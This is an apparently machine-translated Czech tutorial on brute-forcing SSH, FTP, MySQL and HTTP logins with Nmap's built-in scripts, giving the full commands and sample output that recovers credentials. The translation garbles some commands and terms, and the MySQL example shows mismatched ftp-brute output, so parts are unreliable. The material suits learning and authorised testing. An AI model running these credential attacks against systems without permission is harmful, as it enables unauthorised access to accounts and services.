Nmap

Vynucené heslo pomocí Nmap

Vynucené heslo pomocí Nmap
K brute-force online službám lidé běžně používají Hydra, Medusa a Metasploit Framework, ale Nmap lze použít také k brute-force mnoha online služeb. Existují integrované skripty Nmap, které podporují FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP a další různé služby. Můžete také hrubou silou vynutit metody ověřování založené na formuláři, základní a digest. Pokud máte nainstalovaný Nmap, můžete tyto skripty vidět v adresáři „/ usr / share / nmap / scripts“.

[email protected]: ~ $ sudo apt update && sudo apt upgrade
[chráněno e-mailem]: ~ $ sudo apt install nmap -y
[chráněno e-mailem]: ~ $ cd / usr / share / nmap / scripts /
[chráněno e-mailem]: ~ $ ls * brutální *

V tomto kurzu prozkoumáme, jak můžeme použít Nmap k útoku hrubou silou.

SSH Brute-Force

SSH je zabezpečený protokol vzdálené správy a podporuje ověřování založené na openssl a heslech. K ověření pomocí hesla SSH pomocí brute-force můžeme použít „ssh-brute.nse ”Nmapový skript.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brutální.nse

Předejte seznam uživatelských jmen a hesel jako argument společnosti Nmap.

[chráněno e-mailem]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = uživatelé.txt, passdb = hesla.txt
Spuštění Nmap 7.70 (https: // nmap.org) v 2020-02-08 17:09 PKT
Zpráva o skenování Nmap pro 192.168.43.181
Hostitel je nahoře (0.Latence 00033s).
SLUŽBA PŘÍSTAVNÍHO STÁTU
22 / tcp otevřené ssh
| ssh-brute:
| Účty:
| admin: p4ssw0rd - platná pověření
| _ Statistiky: Provedeno 99 odhadů za 60 sekund, průměrné tps: 1.7
Nmap hotovo: 1 IP adresa (1 hostitel nahoru) naskenována v 60.17 sekund

FTP Brute-Force

FTP je protokol pro přenos souborů, který podporuje ověřování na základě hesla. Pro hrubou sílu FTP použijeme „ftp-brute.skript nse ”Nmap.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brutální.nse

Předejte seznam uživatelských jmen a hesel jako argument společnosti Nmap.

[chráněno e-mailem]: ~ $ nmap --script ftp-brute -p21 192.168.43.181 --script-args
userdb = uživatelé.txt, passdb = hesla.txt
Spuštění Nmap 7.70 (https: // nmap.org) v 2020-02-08 16:51 PKT
Zpráva o skenování Nmap pro 192.168.43.181
Hostitel je nahoře (0.Latence 00021s).
SLUŽBA PŘÍSTAVNÍHO STÁTU
21 / tcp otevřené ftp
| ftp-brute:
| Účty:
| admin: p4ssw0rd - platná pověření
| _ Statistiky: Provedeno 99 odhadů za 20 sekund, průměrné tps: 5.0
Nmap hotovo: 1 IP adresa (1 hostitel nahoru) naskenována v 19.50 sekund

MYSQL Brute-Force

Někdy je MySQL ponechán otevřený vnějším připojením a umožňuje komukoli se k němu připojit. Jeho heslo lze prolomit pomocí Nmapu se skriptem „mysql-brute“.

[chráněno e-mailem]: ~ $ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb = uživatelé.txt, passdb = hesla.txt
Spuštění Nmap 7.70 (https: // nmap.org) v 2020-02-08 16:51 PKT
Zpráva o skenování Nmap pro 192.168.43.181
Hostitel je nahoře (0.Latence 00021s).
SLUŽBA PŘÍSTAVNÍHO STÁTU
3306 / tcp otevřít mysql
| ftp-brute:
| Účty:
| admin: p4ssw0rd - platná pověření
| _ Statistiky: Provedeno 99 odhadů za 20 sekund, průměrné tps: 5.0
Nmap hotovo: 1 IP adresa (1 hostitel nahoru) naskenována v 19.40 sekund

Hrubá síla HTTP

Protokol HTTP používá k ověření uživatelů na webových serverech tři typy ověřování. Tyto metodiky se používají ve směrovačích, modemech a pokročilých webových aplikacích k výměně uživatelských jmen a hesel. Jsou to tyto typy:

Základní ověřování

V základním ověřovacím protokolu HTTP prohlížeč zakóduje uživatelské jméno a heslo pomocí base64 a odešle jej pod hlavičkou „Autorizace“. Můžete to vidět na následujícím snímku obrazovky.

Autorizace: Základní YWRtaW46YWRtaW4 =

Tento řetězec můžete dekódovat pomocí base64, abyste viděli uživatelské jméno a heslo

[chráněno e-mailem]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
admin: admin

Základní ověřování HTTP je nezabezpečené, protože odesílá uživatelské jméno i heslo ve formátu prostého textu. Jakýkoli Man-in-the-Middle Attacker může snadno zachytit provoz a dekódovat řetězec, aby získal heslo.

Ověřování digestu

HTTP Digest Authentication používá hashovací techniky k zašifrování uživatelského jména a hesla před odesláním na server.

Hash1 = MD5 (uživatelské jméno: sféra: heslo)
Hash2 = MD5 (metoda: digestURI)
response = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Tyto hodnoty můžete vidět v záhlaví „Autorizace“.

Ověřování založené na přehledu je zabezpečené, protože heslo se neposílá jako prostý text. Pokud útočník typu Man-in-the-Middle zachytí provoz, nebude schopen získat heslo ve formátu prostého textu.

Ověření na základě formuláře

Základní a Digest autentizace podporují pouze přenos uživatelského jména a hesla, zatímco autentizaci založenou na formuláři lze přizpůsobit podle potřeb uživatele. Můžete si vytvořit vlastní webovou stránku v HTML nebo JavaScriptu a použít své vlastní techniky kódování a přenosu.

Data ve ověřování na základě formuláře se obvykle odesílají ve formátu prostého textu. Z bezpečnostních důvodů je nutné použít HTTP, aby se zabránilo útokům typu Man-in-the-Middle.

Můžeme hrubou silou všechny typy ověřování HTTP pomocí Nmap. Za tímto účelem použijeme skript „http-brute“.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-brute.nse

Chcete-li otestovat tento skript Nmap, vyřešíme veřejně hostovanou výzvu hrubou silou od pentester akademie na této adrese URL http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Musíme jako argument skriptu poskytnout vše včetně názvu hostitele, URI, metody požadavku a slovníků samostatně.

[chráněno e-mailem]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.hostname = pentesteracademylab.appspot.com,
http-brute.path = / lab / webapp / basicauth, userdb = uživatelé.txt, passdb = hesla.txt,
http-brute.metoda = POST
 
Spuštění Nmap 7.70 (https: // nmap.org) v 2020-02-08 21:37 PKT
Zpráva o skenování Nmap pro pentesteracademylab.appspot.com (216.58.210.84)
Hostitel je nahoře (0.Latence 20 s).
Další adresy pro pentesteracademylab.appspot.com (nenaskenováno): 2a00: 1450: 4018: 803 :: 2014
Záznam rDNS pro 216.58.210.84: mct01s06-in-f84.1e100.síť
 
SLUŽBA PŘÍSTAVNÍHO STÁTU
80 / TCP otevřený http
| http-brute:
| Účty:
| admin: aaddd - platná pověření
| _ Statistiky: Provedeno 165 odhadů za 29 sekund, průměrné tps: 5.3
Nmap hotovo: 1 IP adresa (1 hostitel nahoru) naskenována za 31.22 sekund

Závěr

Nmap lze použít k provádění mnoha věcí i přes jednoduché skenování portů. Může nahradit Metasploit, Hydra, Medusa a mnoho dalších nástrojů vyrobených speciálně pro online hrubou hru. Nmap má jednoduché a snadno použitelné vestavěné skripty, které hrubou silou téměř všechny služby, včetně HTTP, TELNEL, SSH, MySQL, Samba a další.

Hry Jak zvýšit FPS v Linuxu?
Jak zvýšit FPS v Linuxu?
FPS znamená Snímků za sekundu. Úkolem FPS je měřit snímkovou frekvenci při přehrávání videa nebo herních výkonech. Jednoduše řečeno, počet nepřerušova...
Hry Nejlepší hry Oculus App Lab
Nejlepší hry Oculus App Lab
Pokud jste vlastníkem náhlavní soupravy Oculus, musíte mít informace o bočním nakládání. Sideloading je proces instalace neukládaného obsahu do náhlav...
Hry Top 10 her k hraní na Ubuntu
Top 10 her k hraní na Ubuntu
Platforma Windows byla jednou z dominujících platforem pro hraní her kvůli velkému procentu her, které se dnes vyvíjejí, aby nativně podporovaly Windo...